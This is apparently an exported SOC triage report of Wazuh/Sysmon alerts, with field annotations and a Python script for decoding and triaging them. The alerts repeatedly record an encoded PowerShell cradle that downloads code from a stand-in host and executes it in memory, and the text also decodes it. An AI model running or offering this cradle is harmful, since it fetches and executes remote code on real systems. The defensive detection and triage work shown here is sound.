Windows event level: 1 critical, 2 error, 3 warning, 4 information, 5 verbose. Sysmon writes everything at 4, so it says nothing about how bad the event is – use rule.level.

data.win.system.task:  1
Task category number. Sysmon sets it equal to the event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:45.1715994Z
When the event was written to the Windows event log (UTC, 100‑ns ticks). Compare with eventdata.utcTime (when it happened) and timestamp (when Wazuh processed it) to measure collection lag.

data.win.system.eventRecordID:  284820
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the log entry – the Sysmon service itself, not the process being reported. The reported process is in eventdata.processId.

data.win.system.threadID:  4740
Thread in the Sysmon service that wrote the entry. Constant across these alerts; ignore for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel holding the record. Microsoft-Windows-Sysmon/Operational is the Sysmon log – query it with Get-WinEvent or wevtutil around this eventRecordID to see the neighbouring records.

data.win.system.computer:  Attacker
Hostname Windows stamped on the event. Should equal agent.name; a mismatch means forwarded events or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:42.397 ProcessGuid: {94294ddc-bd72-680a-860b-000000000e00} ProcessId: 15968 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd6f-680a-840b-000000000e00} ParentProcessId: 6508 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Rendered ProcessCreate message, the whole record in one string. powershell.exe (PID 6508) started powershell.exe (PID 15968) with -NoLogo -NoProfile -EncodedCommand; the Base64 is UTF‑16LE and decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test') – the same download‑and‑execute cradle as the previous ProcessCreate alert. ParentCommandLine is identical to CommandLine, so the chain now reads 14508 → 6508 → 15968, each hop re‑launching the same command.

data.win.eventdata.utcTime:  2025-04-24 22:38:42.397
When the process started on the endpoint (UTC, ms). The authoritative timeline value.

data.win.eventdata.processGuid:  {94294ddc-bd72-680a-860b-000000000e00}
Sysmon's never‑reused ID for the new process. Search it as ProcessGuid in EID 11 (files written) and EID 3 (network connections), and as ParentProcessGuid in later EID 1s, to follow what it did next.

data.win.eventdata.processId:  15968
PID of the new process. Recycled after exit – join on processGuid, not PID.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable that started. Legitimate powershell.exe – the parent and command line, not the binary, make this suspicious.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version resource of the image. 10.0.26100 is the Windows 11 24H2 / Server 2025 build line – consistent with an OS‑shipped binary rather than a dropped copy.

data.win.eventdata.description:  Windows PowerShell
Description string from the PE version resource. Attackers who rename binaries rarely rewrite it, so it helps unmask a renamed PowerShell.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource; same use as description.

data.win.eventdata.company:  Microsoft Corporation
Company string from the PE version resource. Expected for a System32 binary; check the Authenticode signature separately if in doubt, EID 1 does not verify it.

data.win.eventdata.originalFileName:  PowerShell.EXE
OriginalFileName from the PE version resource. Compare with the image's on‑disk name – OriginalFileName PowerShell.EXE running under another name is a masquerading tell (T1036).

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Exact command line of the new process. Decode -EncodedCommand (Base64 of UTF‑16LE) before judging it: here it is IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), i.e. fetch remote code and run it in memory. -NoProfile and -NoLogo are standard in cradles to skip profile scripts and banner output. The powershell.exe path appears twice: once as argv[0] and once as the first argument handed to it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory at start – the user's profile root here.

data.win.eventdata.user:  Attacker\\Attcker1
Account the new process runs as.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
Sysmon ID of the logon session. Identical across the PowerShell processes in these alerts, so they share one session; match it to Security 4624 to see how that session began.

data.win.eventdata.logonId:  0x26584
Windows logon session ID (hex). Equals the Logon ID in Security events 4624/4672/4688 for the same session.

data.win.eventdata.terminalSessionId:  1
Windows session number: 0 = services/SYSTEM, 1 and up = interactive users (console or RDP). 1 here means a user is logged on interactively.

data.win.eventdata.integrityLevel:  Medium
Mandatory integrity level: Low, Medium (standard user), High (elevated admin) or System. Medium – the cradle is not running elevated.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash(es) of the image file, algorithms chosen in the Sysmon config (SHA256 here). Same hash as the previous hop, as expected for the same on‑disk powershell.exe; look it up against a known‑good inventory or VirusTotal.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd6f-680a-840b-000000000e00}
Sysmon ID of the parent. Equals the processGuid of the parent's own EID 1 – here the powershell.exe (PID 6508) created in the previous ProcessCreate alert, extending the PowerShell → PowerShell chain.

data.win.eventdata.parentProcessId:  6508
PID of the parent. Cross‑check against parentProcessGuid before trusting it (PIDs recycle).

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable of the parent. PowerShell spawning PowerShell with an encoded command is exactly what this rule keys on.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Parent's full command line. Identical to commandLine – the same encoded cradle is being re‑launched hop after hop; rule.firedtimes counts the hops.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent runs as. Same as user – no privilege change across the hop.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.
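The two "Powershell.exe spawned a powershell process which executed a base64 encoded command" alerts above carry the same -EncodedCommand blob and link to each other through ProcessGuid/ParentProcessGuid (14508 → 6508 → 15968). The script below is an added example, not part of this report and not Wazuh's code; it decodes the blob the way PowerShell reads it (Base64 over UTF‑16LE), labels the result a download cradle when it pairs Invoke-Expression with a download primitive, and walks the parent chain. The command line and the two records are the eventdata fields from those alerts; the list of accepted -EncodedCommand spellings is an assumption covering the common abbreviations, and the "whoami" and -ep inputs in the usage are constructed.

```python
import base64
import binascii
import re

# -EncodedCommand may be abbreviated to any unambiguous prefix (-e, -ec,
# -en, -enc, ... -encodedcommand); the prefix test below accepts those.
_ARG = re.compile(r'(?i)(?:^|\s)-(e[a-z]*)\s+"?([A-Za-z0-9+/=]+)')


def decode_encoded_command(command_line):
    """Return the plaintext behind -EncodedCommand, or None if absent/invalid.
    PowerShell expects Base64 of the UTF-16LE bytes of the script."""
    for m in _ARG.finditer(command_line):
        name, blob = m.group(1).lower(), m.group(2)
        if name != "ec" and not "encodedcommand".startswith(name):
            continue  # e.g. -ep / -ex (ExecutionPolicy) are not it
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return None
    return None


def is_download_cradle(script):
    """True when the script both fetches content and executes it in memory."""
    runs = re.search(r"(?i)\b(?:iex|invoke-expression)\b", script)
    fetches = re.search(r"(?i)downloadstring|downloadfile|webclient|"
                        r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b", script)
    return bool(runs and fetches)


def process_chain(records, start_guid):
    """Walk ParentProcessGuid links from start_guid upward.
    Returns PIDs child -> ... -> root; the root is the first parent with no
    ProcessCreate record in `records` (its PID is taken from the child)."""
    by_guid = {r["processGuid"]: r for r in records}
    pids, guid = [], start_guid
    while guid in by_guid:
        rec = by_guid[guid]
        pids.append(rec["processId"])
        guid = rec["parentProcessGuid"]
        if guid not in by_guid:
            pids.append(rec["parentProcessId"])
    return pids


def triage_chain(records, start_guid):
    """Summarise a chain: PIDs, distinct decoded payloads, cradle verdict."""
    pids = process_chain(records, start_guid)
    payloads = {decode_encoded_command(r["commandLine"])
                for r in records if r["processId"] in pids}
    payloads.discard(None)
    return {"pids": pids, "payloads": sorted(payloads),
            "cradle": any(is_download_cradle(p) for p in payloads)}


# Command line shared by both ProcessCreate alerts above (page data).
CMDLINE = (
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    "-NoLogo -NoProfile -EncodedCommand "
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA"
    "ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)

# eventdata fields of the two EID 1 alerts above (page data).
EID1_RECORDS = [
    {"processGuid": "{94294ddc-bd6f-680a-840b-000000000e00}", "processId": 6508,
     "parentProcessGuid": "{94294ddc-bd6c-680a-7e0b-000000000e00}",
     "parentProcessId": 14508, "commandLine": CMDLINE},
    {"processGuid": "{94294ddc-bd72-680a-860b-000000000e00}", "processId": 15968,
     "parentProcessGuid": "{94294ddc-bd6f-680a-840b-000000000e00}",
     "parentProcessId": 6508, "commandLine": CMDLINE},
]

if __name__ == "__main__":
    summary = triage_chain(EID1_RECORDS, "{94294ddc-bd72-680a-860b-000000000e00}")
    print("chain  :", " -> ".join(map(str, summary["pids"])))
    for payload in summary["payloads"]:
        print("decoded:", payload)
    print("cradle :", summary["cradle"])
    # Constructed inputs: a short-form -enc and a command line without one.
    print(decode_encoded_command("powershell -enc dwBoAG8AYQBtAGkA"))   # whoami
    print(decode_encoded_command('powershell.exe -ep bypass -c "whoami"'))  # None
```

Decoding first matters because the Base64 hides the URL and the primitive (DownloadString into Invoke-Expression) that the analyst needs for blocking and hunting; a chain whose every hop decodes to the same payload is one campaign, not several, and should be tracked as one case.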

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:47.166+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:47.166+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  80
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534327.1708777
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:45.3727583Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284823
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:45.358 ProcessGuid: {94294ddc-bd72-680a-860b-000000000e00} ProcessId: 15968 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_55t22iid.tbx.ps1 CreationUtcTime: 2025-04-24 22:38:45.358 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:45.358
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd72-680a-860b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_55t22iid.tbx.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:45.358
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:50.423+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:50.423+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  77
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534330.1711546
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:48.2560190Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284882
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:46.626 ProcessGuid: {94294ddc-bd76-680a-890b-000000000e00} ProcessId: 16036 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd72-680a-860b-000000000e00} ParentProcessId: 15968 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:46.626
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd76-680a-890b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16036
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd72-680a-860b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  15968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:50.439+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:50.439+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  81
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534330.1719617
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
